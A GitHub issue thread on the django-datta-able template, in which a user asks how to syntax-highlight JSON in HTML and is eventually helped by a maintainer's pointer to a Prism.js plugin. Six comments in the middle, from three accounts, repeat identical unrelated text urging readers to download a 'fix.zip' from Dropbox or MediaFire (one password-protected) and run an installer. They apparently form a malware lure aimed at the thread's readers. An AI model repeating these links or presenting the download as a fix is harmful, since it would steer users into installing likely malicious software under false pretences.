### ISSUE TITLE
Would like to add syntax highlighting to JSON displayed in HTML

### ISSUE THREAD

**Issue by jswift24** [app-generator/django-datta-able#44]
I'm displaying a JSON snippet:
![image](https://github.com/user-attachments/assets/8c8fbebb-3f32-42fa-90f9-d6d578193a46)

I'd like to add syntax highlighting, like what's described in the [docs ](https://django-datta-able-enh.appseed-srv1.com/elements-ac_syntax_highlighter.html but I can't get it working. Here's the code I'm using:

`<pre><code id="json-output" class="json" style="font-size: 1rem;">{{ cohorts_json|json_format }}</code></pre>`

```
<style>
pre {
    background-color: #f4f4f4;
    padding: 10px;
    border-radius: 5px;
}
pre code.json {
    font-family: monospace;
    white-space: pre-wrap;
}
</style>
```

Please help.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by app-generator** [comment]
Hello @jswift24 

Try integrate this: http://www.eslinstructor.net/vkbeautify/

![image](https://github.com/user-attachments/assets/dbbe7923-bc6f-4ed0-9486-fd39b99926cc)

**Comment by jswift24** [comment]
Thanks. Looks like that plugin does pretty-printing. I'm looking for syntax highlighting (in colors). I thought this was built into the Datta Able template, doc link above?

**Comment by app-generator** [comment]
https://prismjs.com/plugins/jsonp-highlight/ might help

**Comment by jswift24** [comment]
That worked great! Thank you.
